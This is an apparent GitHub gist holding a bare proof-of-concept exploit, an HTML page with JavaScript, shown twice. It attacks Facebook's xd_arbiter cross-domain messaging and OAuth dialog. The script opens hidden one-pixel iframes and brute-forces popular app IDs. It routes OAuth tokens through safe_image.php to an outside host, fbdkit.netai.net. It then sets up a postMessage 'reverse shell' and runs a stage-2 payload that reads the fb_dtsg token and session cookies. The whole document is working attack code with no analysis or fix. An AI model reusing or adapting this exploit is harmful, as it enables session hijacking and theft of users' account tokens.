phwd/gist:5639136

## gistfile1.html
<html>
<head></head>
<body onload="go()">
  <div id="log_div"></div>
	<script>
		function my_log(message) { document.getElementById('log_div').innerHTML += (message.toString() + "<br />");	}

		// wiretap
		(window.addEventListener || window.attachEvent)('message', function(e) { console.log('wiretap: ' + e.data); my_log("wiretap: " + e.data); }, false);

		function load_frame(_name, _url)
		{
			var x =
				(/MSIE (6|7|8)/).test(navigator.userAgent) ?
					document.createElement('<iframe name="' + _name + '">')
				:
					document.createElement('iframe');
			//x.style.display = "none";
			x.style.width = 1;
			x.style.height = 1;
			//x.src = 'javascript:false';
			x.name = _name;
			x.id = _name;
			document.body.appendChild(x);
			x.src = _url;

			// for firefox
			// x.src = _url;
			//frames[_name].location = _url;
		}

		function setup_proxy2()
		{
			my_log("setup_proxy2 start");
			load_frame("fb_xdm_frame_http2", "http://facebook.com/connect/xd_arbiter.php?version=11#channel=my_channel&origin=http%3A%2F%2Ffacebook.com&transport=flash");
			my_log("setup_proxy2 finished");
		}

		function setup_proxy()
		{
			my_log("setup_proxy start");
			load_frame("fb_xdm_frame_http", "http://facebook.com/connect/xd_arbiter.php?version=11#channel=my_channel_http&origin=http%3A%2F%2Ffacebook.com&transport=flash");
			my_log("setup_proxy finished");
		}

		function deliver_stage0_payload_through(authorized_app_id)
		{
			my_log("deliver_stage0_payload_through start (authorized_app_id = " + authorized_app_id + ")");
			if(!reverse_shell_bound)
			{
				var jssdk_app_id = 114545895322903;
				var reverse_shell_payload_endpoint =
					// stage 0 -> jmp color map
					"http://www.facebook.com/safe_image.php?d=AQCpZd43YhJr_orL&url=http%3A%2F%2Ffbdkit.netai.net%2Fpagetab%2Fline_256_half_29.gif"

				load_frame("fb_xdm_frame_http" + authorized_app_id.toString(), "http://facebook.com/connect/xd_arbiter.php?version=11#FB_RPC:{\"method\":\"showDialog\", \"params\":[{\"=&relation=parent&\":0, \"&origin=http%3A%2F%2Ffacebook.com&\":0,\"method\":\"permissions.request\",\"abc\":\"qwa\",\"display\":\"page\", \"app_id\":\"" + authorized_app_id + "\", \"response_type\":\"token,signed_request,code\", \"redirect_uri\":\"http://facebook.com/dialog/oauth?client_id=" + jssdk_app_id + "&response_type=token%2Csigned_request%2Ccode&display=none&domain=www.facebook.com&redirect_uri=" + encodeURIComponent(reverse_shell_payload_endpoint) + "&sdk=joey\"}]}");
				setTimeout(function() { deliver_stage0_payload_through(authorized_app_id); }, 3000);
			}
			my_log("deliver_stage0_payload_through finished");
		}


		var reverse_shell_bound = false;
		var reverse_shell_bound_keyphrase = "FB_RPC:reverse_shell_bound";

		(window.addEventListener || window.attachEvent)('message',
			function(event){
				reverse_shell_bound = event.data == reverse_shell_bound_keyphrase;
			}, false);

		function deliver_stage2_payload(stage2_payload)
		{
			// Connection acknowledgement received, delivering stage2 payload
			if(reverse_shell_bound)
			{
				parent.postMessage(stage2_payload, "http://www.facebook.com");
			}
			else
			{
				var report_keyphrase_payload =
					"for(var fr = 0; fr < window.frames.length; fr++)" +
					"{ window.frames[fr].postMessage(\"" + reverse_shell_bound_keyphrase + "\", \"http://fbdkit.netai.net\") }";
				parent.postMessage(report_keyphrase_payload, "http://www.facebook.com");
				setTimeout(function() { deliver_stage2_payload(stage2_payload) }, 300)
			}
		}

		function go()
		{
			var lag = 100;

			setTimeout(setup_proxy2, lag); 		// sender-xd_arbiter
			setTimeout(setup_proxy, lag);		// proxy-xd_arbiter

			var authorized_app_ids_to_check =
			[
				111239619098,		// bing
				139475280761,		// pandora
				162729813767876,	// tripadvisor
				97534753161, 		// yelp
				326803741017,		// rottentomatoes
				175789541954,		// clicker
				136494494209,		// scribd
				119178388096593,	// docs
				176611639027113,	// zynga
				111071104403,		// kixeye
				221300197978270,	// ea

				// additional

				120131118061981,	// freelancer.com
				113869198637480,	// developers.facebook.com <- every app developers should have authorized it
				114545895322903,	// js sdk
				178222352279634, 	// angry birds!
			];

			for(var id_num = 0; id_num < authorized_app_ids_to_check.length; id_num++)
			{
				// multiple payload-xd_arbiters to bruteforce authorized apps
				setTimeout("deliver_stage0_payload_through(" + authorized_app_ids_to_check[id_num] + ")", 500 + lag + 50*id_num);
			}

			deliver_stage2_payload("alert('hi there! fb_dtsg =  ' + Env.fb_dtsg + ', cookies: ' + document.cookie)");
		}

	  </script>
</body>
</html>
	<html>
	<head></head>
	<body onload="go()">
	<div id="log_div"></div>
	<script>
	function my_log(message) { document.getElementById('log_div').innerHTML += (message.toString() + "<br />"); }

	// wiretap
	(window.addEventListener \|\| window.attachEvent)('message', function(e) { console.log('wiretap: ' + e.data); my_log("wiretap: " + e.data); }, false);

	function load_frame(_name, _url)
	{
	var x =
	(/MSIE (6\|7\|8)/).test(navigator.userAgent) ?
	document.createElement('<iframe name="' + _name + '">')
	:
	document.createElement('iframe');
	//x.style.display = "none";
	x.style.width = 1;
	x.style.height = 1;
	//x.src = 'javascript:false';
	x.name = _name;
	x.id = _name;
	document.body.appendChild(x);
	x.src = _url;

	// for firefox
	// x.src = _url;
	//frames[_name].location = _url;
	}

	function setup_proxy2()
	{
	my_log("setup_proxy2 start");
	load_frame("fb_xdm_frame_http2", "http://facebook.com/connect/xd_arbiter.php?version=11#channel=my_channel&origin=http%3A%2F%2Ffacebook.com&transport=flash");
	my_log("setup_proxy2 finished");
	}

	function setup_proxy()
	{
	my_log("setup_proxy start");
	load_frame("fb_xdm_frame_http", "http://facebook.com/connect/xd_arbiter.php?version=11#channel=my_channel_http&origin=http%3A%2F%2Ffacebook.com&transport=flash");
	my_log("setup_proxy finished");
	}

	function deliver_stage0_payload_through(authorized_app_id)
	{
	my_log("deliver_stage0_payload_through start (authorized_app_id = " + authorized_app_id + ")");
	if(!reverse_shell_bound)
	{
	var jssdk_app_id = 114545895322903;
	var reverse_shell_payload_endpoint =
	// stage 0 -> jmp color map
	"http://www.facebook.com/safe_image.php?d=AQCpZd43YhJr_orL&url=http%3A%2F%2Ffbdkit.netai.net%2Fpagetab%2Fline_256_half_29.gif"

	load_frame("fb_xdm_frame_http" + authorized_app_id.toString(), "http://facebook.com/connect/xd_arbiter.php?version=11#FB_RPC:{\"method\":\"showDialog\", \"params\":[{\"=&relation=parent&\":0, \"&origin=http%3A%2F%2Ffacebook.com&\":0,\"method\":\"permissions.request\",\"abc\":\"qwa\",\"display\":\"page\", \"app_id\":\"" + authorized_app_id + "\", \"response_type\":\"token,signed_request,code\", \"redirect_uri\":\"http://facebook.com/dialog/oauth?client_id=" + jssdk_app_id + "&response_type=token%2Csigned_request%2Ccode&display=none&domain=www.facebook.com&redirect_uri=" + encodeURIComponent(reverse_shell_payload_endpoint) + "&sdk=joey\"}]}");
	setTimeout(function() { deliver_stage0_payload_through(authorized_app_id); }, 3000);
	}
	my_log("deliver_stage0_payload_through finished");
	}


	var reverse_shell_bound = false;
	var reverse_shell_bound_keyphrase = "FB_RPC:reverse_shell_bound";

	(window.addEventListener \|\| window.attachEvent)('message',
	function(event){
	reverse_shell_bound = event.data == reverse_shell_bound_keyphrase;
	}, false);

	function deliver_stage2_payload(stage2_payload)
	{
	// Connection acknowledgement received, delivering stage2 payload
	if(reverse_shell_bound)
	{
	parent.postMessage(stage2_payload, "http://www.facebook.com");
	}
	else
	{
	var report_keyphrase_payload =
	"for(var fr = 0; fr < window.frames.length; fr++)" +
	"{ window.frames[fr].postMessage(\"" + reverse_shell_bound_keyphrase + "\", \"http://fbdkit.netai.net\") }";
	parent.postMessage(report_keyphrase_payload, "http://www.facebook.com");
	setTimeout(function() { deliver_stage2_payload(stage2_payload) }, 300)
	}
	}

	function go()
	{
	var lag = 100;

	setTimeout(setup_proxy2, lag); // sender-xd_arbiter
	setTimeout(setup_proxy, lag); // proxy-xd_arbiter

	var authorized_app_ids_to_check =
	[
	111239619098, // bing
	139475280761, // pandora
	162729813767876, // tripadvisor
	97534753161, // yelp
	326803741017, // rottentomatoes
	175789541954, // clicker
	136494494209, // scribd
	119178388096593, // docs
	176611639027113, // zynga
	111071104403, // kixeye
	221300197978270, // ea

	// additional

	120131118061981, // freelancer.com
	113869198637480, // developers.facebook.com <- every app developers should have authorized it
	114545895322903, // js sdk
	178222352279634, // angry birds!
	];

	for(var id_num = 0; id_num < authorized_app_ids_to_check.length; id_num++)
	{
	// multiple payload-xd_arbiters to bruteforce authorized apps
	setTimeout("deliver_stage0_payload_through(" + authorized_app_ids_to_check[id_num] + ")", 500 + lag + 50*id_num);
	}

	deliver_stage2_payload("alert('hi there! fb_dtsg = ' + Env.fb_dtsg + ', cookies: ' + document.cookie)");
	}

	</script>
	</body>
	</html>